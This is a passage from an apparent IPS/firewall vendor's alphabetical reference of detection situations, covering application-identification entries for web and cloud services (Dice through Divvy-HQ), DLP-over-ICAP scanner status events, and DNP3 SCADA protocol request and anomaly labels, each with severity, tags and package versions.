Last changed: sgpkg-ips-1062-5242
Description: A network connection launched by the Windows Device Display Object Function Discovery Provider was detected.
Back to top

DEXMA-PLM

About this situation: Application DEXMA-PLM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DEXMA is a PLM software to simplify business processes, access and share information, connect team members and enable collaboration. We developed DEXMA for small and medium engineering companies and remote engineering teams.
Back to top

DHCP

About this situation: Dynamic Host Configuration Protocol (DHCP) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1227-5242
Description: Dynamic Host Configuration Protocol (DHCP) usage.
Back to top

DialogTech

About this situation: Application DialogTech detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DialogTech provides a suite of technologies to analyze, control, and personalize voice conversations for retain customers.
Back to top

Diamonds-Evolution

About this situation: Application Diamonds-Evolution detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Diamonds Evolution, a complete CRM solution for marketing, sales and post sales
Back to top

Diapers.com

About this situation: Diapers.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Diapers.com company set out delivering consumables, such as diapers, wipes, and formula.
Back to top

Dice

About this situation: Application Dice detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Services Dice.com Offers to Recruit Employees Online
Back to top

DiCentral

About this situation: Application DiCentral detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DiCentral provides web-hosted EDI solution for buyers and suppliers collaboration and exchanging enterprise data without software or hardware.
Back to top

DICOM

About this situation: Digital Imaging and Communications in Medicine (DICOM) usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Health
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-754-5211
Description: Digital Imaging and Communications in Medicine (DICOM) protocol usage detected. DICOM is used to transmit medical image data.
Back to top

DIDWW

About this situation: Application DIDWW detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DIDWW is an inbound carrier providing origination services from over 60 countries worldwide.
Back to top

Die-Welt

About this situation: Welt.de usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-707-5211
Last changed: sgpkg-ips-707-5211
Description: Diw Welt is a German daily newspaper.
Back to top

DiffNow

About this situation: Application DiffNow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DiffNow is a service that allows compare text files, documents, binary files, and archives. It is allows upload the files to compare or enter their URLs. Results are returned as an interactive HTML report.
Back to top

Digg

About this situation: digg usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: This site features user-submitted news stories that users can vote on to increase or decrease the story's popularity ranking. Source: Wikipedia
Back to top

Digi-International

About this situation: Application Digi-International detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Digi International is a provider of mission-critical machine-to-machine
Back to top

DIGIcation

About this situation: Application DIGIcation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Digication provides ePortfolio and Assessment Management Systems for K-12 and Higher Education Institutions.
Back to top

DigiCert

About this situation: Application DigiCert detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DigiCert is a certificate authority and provider of managed PKI, SSL, and identity authentication services. It offers for organizations to take control of SSL certificate management and use industry tools.
Back to top

Digicert-Online-Certificate-Status-Service

About this situation: Digicert Online Certificate Status service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-758-5211
Description: Online Certitificate Status Protocol (OCSP) is used to validate status of Extended Validation Certificates (EV certificates) used with HTTPS.
Back to top

Digidip

About this situation: Application Digidip detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Digidip provides analytics for international performance marketing.
Back to top

DigiMAINT

About this situation: Application DigiMAINT detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DigiMAINT is a WEB-based aviation maintenance management system, designed for aircraft operators, maintenance facilities and stock distributors.
Back to top

DIGIPASS-as-a-Service

About this situation: Application DIGIPASS-as-a-Service detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DIGIPASS as a Service is VASCO's cloud based authentication service which makes use of VASCO's proprietary authentication technology. ASP's can secure their entire infrastructure with DIGIPASS as a Service. Web application providers can focus on their core business while VASCO takes care of all aspects of securing their network and applications in a service model.
Back to top

Digital-Chalk

About this situation: Application Digital-Chalk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DigitalChalk is online training platform, which was designed to handle the needs of small organizations and large enterprises, supporting course sales and internal course delivery to both employees and customers alike.
Back to top

Digital-Invoicing

About this situation: Application Digital-Invoicing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Digital Invoicing - The Antidote to Accountancy Software
Back to top

Digital-Realty

About this situation: Application Digital-Realty detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Telx helps companies build more agile businesses faster with reduced infrastructure complexity and broader reach to new markets. Telx colocation and connectivity products serve a broad range of industries from network dense Internet/Cloud Gateway data centers.
Back to top

Digital-River

About this situation: Application Digital-River detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Digital River provides global ecommerce, payments and marketing services.
Back to top

Digital-Waybill

About this situation: Application Digital-Waybill detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Digital Waybill Courier Software is designed for couriers, messengers, trucking and delivery companies. The software contains open deliveries received both online and over the telephone. Pricing, dispatching, invoicing, driver commissions and more.
Back to top

Digitalbucket.net

About this situation: Digitalbucket.net usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: digitalbucket.net enables you to create workspaces for employees to share documents, store and access digital files online, create secure environments for your clients and vendors, collaborate on file creation
Back to top

Digitalocean

About this situation: DigitalOcean usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Hosting, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: DigitalOcean is an American virtual private server provider based in New York City, New York. The company leases capacity from existing datacenters, including sites in New York, Amsterdam, San Francisco, London and Singapore. DigitalOcean allows users to create multiple server instances using the same account. DigitalOcean provides scalable virtual private servers, provisioned with SSD storage, in multiple locations, and provides DNS hosting.
Back to top

Digium

About this situation: Application Digium detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Digium offers IP phones, business phone systems, such as Switchvox IP PBX, and custom communications solutions for Asterisk.
Back to top

DigMyData

About this situation: Application DigMyData detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DigMyData claws your business data from the services you use to run your business and expose the secrets it
Back to top

Digsby

About this situation: Digsby usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1010-5242
Description: This application is a freeware proprietary, multiprotocol instant messaging application. Digsby supports most mainstream instant messaging services, such as AOL Instant Messenger, Microsoft .NET Messenger, Yahoo! Messenger, ICQ, Facebook Chat, MySpace Instant Messenger, and XMPP/Jabber based services, such as Google Talk and LiveJournal's Instant Messenger. Also, it supports e mail notifications via POP, IMAP, and webmail like AOL, Yahoo!, and Hotmail (including the ability to mark messages as read, as spam, or delete them ). Digsby users also receive alerts and newsfeeds from MySpace, Facebook, Twitter, and LinkedIn. Source: Wikipedia
Back to top

Diigo

About this situation: Diigo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-629-5211
Description: The name Diigo is an acronym from Digest of Internet Information, Groups and Other stuff. It allows signed up users to bookmark and tag webpages. Additionally, it allows users to highlight any part of a webpage and attach sticky notes to specific highlights or to a whole page.
Back to top

Diino

About this situation: Diino usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-543-5211
Last changed: sgpkg-ips-628-5211
Description: Diino is an online storage and file sharing service. The service is available at http://www.diino.com/.
Back to top

Diligent-Corporation

About this situation: Application Diligent-Corporation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Diligent is provider of secure corporate governance and collaboration solutions that enables board members of corporations, government organisations and not for profit groups to share and collaborate information for board meetings.
Back to top

DimDim

About this situation: Application DimDim detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dimdim was a software company that provided a web-based platform for realtime, rich-media collaboration and meetings. Dimdim provided free web conferencing service where users could share desktops, show slides, collaborate, chat, talk and broadcast via webcam. Dimdim was acquired by Salesforce.com
Back to top

Dimension-Data

About this situation: Application Dimension-Data detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Hosting, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dimension Data is a global company specialising in information technology services, with operations on every inhabited continent. Dimension Datas focus areas include network integration, security solutions, data centre solutions, converged communications, customer interactive solutions, Microsoft solutions and a range of professional, consulting, managed and support services.
Back to top

Dimensional-Fund-Advisors

About this situation: Application Dimensional-Fund-Advisors detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dimensional Fund Advisors
Back to top

dimins

About this situation: Application dimins detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dimensional Insight provide business intelligence software for complex and highly regulated industries, including healthcare, manufacturing
Back to top

Diners-Club-USA

About this situation: Application Diners-Club-USA detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Diners Club USA is US department of Diners Club International - charge card company
Back to top

Diodeo

About this situation: Diodeo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: is a Japanese site for sharing videos online.
Back to top

dionglobal

About this situation: Application dionglobal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dion
Back to top

Diply

About this situation: Diply usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-629-5211
Description: Diply is an online content sharing service.
Back to top

Direct2drive

About this situation: Direct2Drive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a gaming service that allows users to play games or obtain information.
Back to top

DirectBuy

About this situation: Application DirectBuy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DirectBuy is a membership buying service. Product categories include home furnishings, home improvement, entertainment outdoor, flooring, and accessories.
Back to top

DirectConnect

About this situation: DirectConnect traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: DirectConnect is a p2p file sharing protocol.
Back to top

Directiq

About this situation: DirectIQ usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: DirectIQ allows users to easily load email contacts, pick a template, and send out email campaigns.
Back to top

Directly

About this situation: Application Directly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Directly makes on-demand business apps. Directly helps companies build networks that connect customers with experts on demand.
Back to top

Directnic

About this situation: Application Directnic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Directnic is a serrvice that makes registering domain names.
Back to top

DirectorsDesk

About this situation: Application DirectorsDesk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Directors Desk Board Portal is a managed communication system for corporate boards, streamlining board communication and centralizes access to board information.
Back to top

DirectVid

About this situation: DirectVid usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-628-5211
Description: DirectVid provides online video streaming service.
Back to top

Discord

About this situation: Discord traffic detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-1257-5242
Last changed: sgpkg-ips-1257-5242
Description: Discord is a proprietary VoIP application that allows users to communicate over voice, video, and text. STUN network application needs to be allowed in your policy to make Discord work properly.
Back to top

Discourse

About this situation: Application Discourse detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Discussion software is a group of people interested in a common topic who are willing to type paragraphs to each other on a web page.
Back to top

Discover-Card

About this situation: Application Discover-Card detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Discover offers reward credit cards, online banking, home loans, student loans and personal loans.
Back to top

DiscoverOrg

About this situation: Application DiscoverOrg detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DiscoverOrg is an IT Sales Intelligence Platform. The company operates a call center designed to gather extensive information on the information technology and Finance departments of 15,000 Fortune Ranked Mid-Market and SMB companies.
Back to top

Discovery-Benefits

About this situation: Application Discovery-Benefits detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Discovery Benefits is transforming the complexity of employee benefits administration with innovative solutions and extraordinary customer service delivered by empowered and knowledgeable employees.
Back to top

Discovery-Education

About this situation: Application Discovery-Education detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Discovery Education is the provider of the provision of video-based digital curriculum services to primary and secondary schools.
Back to top

Discoveryplus

About this situation: Discoverplus usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1658-5242
Last changed: sgpkg-ips-1723-5242
Description: Discovery+ is a video on-demand over-the-top streaming service. This application situation is meant only for blocking the application.
Back to top

Disney

About this situation: Disney usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1717-5242
Last changed: sgpkg-ips-1717-5242
Description: Disney is a mass media and entertainment conglomerate.
Back to top

Disney+

About this situation: Disney+ usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Description: Disney+ is a video on-demand streaming service. This application situation is meant for blocking the application.
Back to top

Dispop

About this situation: Application Dispop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Boost online sales by targeting new customers and retargeting lost customers with Dispop's self-serve display advertising platform.
Back to top

Disqus

About this situation: Disqus usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-773-5211
Description: Disqus is a global online discussion and commenting system aimed at improving discussion on websites and connecting conversations across the web.
Back to top

divassoftware

About this situation: Application divassoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Divas Software has developed KYCsphere Software-as-a-Service
Back to top

Divshare

About this situation: DivShare usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: DivShare allowes you to upload your videos, photos and other files, for free. You can embed your files anywhere, and co-brand your download pages.
Back to top

Divvy-HQ

About this situation: Application Divvy-HQ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DivvyHQ is a cloud-based, content planning and production workflow tool built to help marketers and content producers get/stay organized and successfully execute demanding, complicated and content-centric marketing initiatives.
Back to top

DLP_File-Allowed

About this situation: File allowed by DLP scan via ICAP.
Context: DLP
Severity: 1
Tags: DLP
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: The file scanned by the DLP scanner was allowed.
Back to top

DLP_File-Blocked

About this situation: File blocked by DLP scan via ICAP.
Context: DLP
Severity: 8
Tags: DLP
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: The file scanned by the DLP scanner was blocked.
Back to top

DLP_File-Too-Big

About this situation: This file is too large for DLP via ICAP scan.
Context: DLP
Severity: 8
Tags: DLP
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: This file could not be submitted for DLP scan because the file is too large for ICAP server upload.
Back to top

DLP_ICAP-Server-Down

About this situation: Connection to the ICAP server was lost.
Context: DLP
Severity: 8
Tags: DLP
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: The connection to the ICAP server was lost. Unable to perform DLP file scans with this server.
Back to top

DLP_ICAP-Server-Error

About this situation: Error while connecting to ICAP server.
Context: DLP
Severity: 8
Tags: DLP
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: An error occurred while connecting to the ICAP server.
Back to top

DLP_ICAP-Server-Incompatible

About this situation: ICAP server is incompatible or misconfigured.
Context: DLP
Severity: 8
Tags: DLP
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: The ICAP server is incompatible or misconfigured.
Back to top

DLP_ICAP-Server-Up

About this situation: Connection to the ICAP server was acquired.
Context: DLP
Severity: 1
Tags: DLP
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: The connection to the ICAP server was established. Ready to perform DLP file scans.
Back to top

DLP_No-ICAP-Server

About this situation: No ICAP servers available for DLP scan requests.
Context: DLP
Severity: 8
Tags: DLP
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: There are no available ICAP servers to handle DLP scan requests.
Back to top

DLP_Scanner-Error

About this situation: Error during DLP scan request.
Context: DLP
Severity: 8
Tags: DLP
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: An error occurred in the handling of a DLP scan request.
Back to top

dlsoftware

About this situation: Application dlsoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DL Software is a software company
Back to top

dlvr.it

About this situation: Application dlvr.it detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: dlvr.it helps publishers deliver content to the social web, including twitter and facebook.
Back to top

Dmclient

About this situation: Endpoint Context Agent based dmclient.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: A network connection launched by the Windows system process dmclient.exe was detected. Dmclient.exe is used by the Microsoft Feedback SIUF Deployment Manager Client.
Back to top

DMV

About this situation: Application DMV detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DMV - Department of Motor Vehicles is an online directory of state DMV web sites with comprehensive guide to Department of Motor Vehicle services including
Back to top

DNAmail

About this situation: Application DNAmail detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Data exchange
Back to top

DNAnexus

About this situation: Application DNAnexus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DNAnexus, a cloud-based genome informatics and data management platform, is accelerating genomic medicine by making it easier to work with genomic data and tools.
Back to top

DnB

About this situation: Application DnB detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DandB is source of commercial information and insight on businesses, enabling companies to Decide. Global commercial database contains more than 225 million business records.
Back to top

DnB-iUpdate

About this situation: Application DnB-iUpdate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iUpdate provides US based Small Businesses and Non-publicly traded companies convenient access to Dun and Bradstreet information on their business.
Back to top

DNP3-TCP

About this situation: DNP3 traffic over TCP
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-759-5211
Description: DNP3 (Distributed Network Protocol) is a set of communications protocol used between components in process automation systems (SCADA). Source: Wikipedia
Back to top

DNP3-TCP-CRC-Invalid

About this situation: The CRC of the DNP3 packet is invalid
Context: DNP3 without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: The CRC of the DNP3 packet is invalid.
Back to top

DNP3-TCP-Invalid-Application-Layer-Control-Byte

About this situation: The application layer control byte is not valid
Context: DNP3 without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: The application layer control byte is not valid
Back to top

DNP3-TCP-Invalid-Link-Layer-Control-Byte

About this situation: The link layer control byte is not valid
Context: DNP3 without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: The link layer control byte is not valid
Back to top

DNP3-TCP-Parse-Error

About this situation: DNP3 (TCP) parsing error
Context: DNP3 without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: DNP3 (TCP) parsing error
Back to top

DNP3-TCP-Reserved-Address

About this situation: The destination of the packet is a reserved address
Context: DNP3 without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: The destination of the packet is a reserved address
Back to top

DNP3-TCP_Abort-File-Request

About this situation: DNP3 Abort File request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Activate-Configuration-Request

About this situation: DNP3 Activate Configuration request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Assign-Class-Request

About this situation: DNP3 Assign Class request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Authenticate-File-Request

About this situation: DNP3 Authenticate File request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Authenticate-Response

About this situation: DNP3 Authenticate response detected
Context: DNP3 (TCP) application response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Authentication-No-Ack-Request

About this situation: DNP3 Authentication No Acknowledgement request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Authentication-Request

About this situation: DNP3 Authentication request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Close-File-Request

About this situation: DNP3 Close File request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Cold-Restart-Request

About this situation: DNP3 Cold Restart request detected
Context: DNP3 (TCP) application request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Confirm-Message

About this situation: DNP3 Confirm message detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Delay-Measurement-Request

About this situation: DNP3 Delay Measurement request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Delete-File-Request

About this situation: DNP3 Delete File request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Direct-Operate-No-Ack-Request

About this situation: DNP3 Direct Operate No Acknowledgement request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Direct-Operate-Request

About this situation: DNP3 Direct Operate request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Disable-Unsolicited-Responses-Request

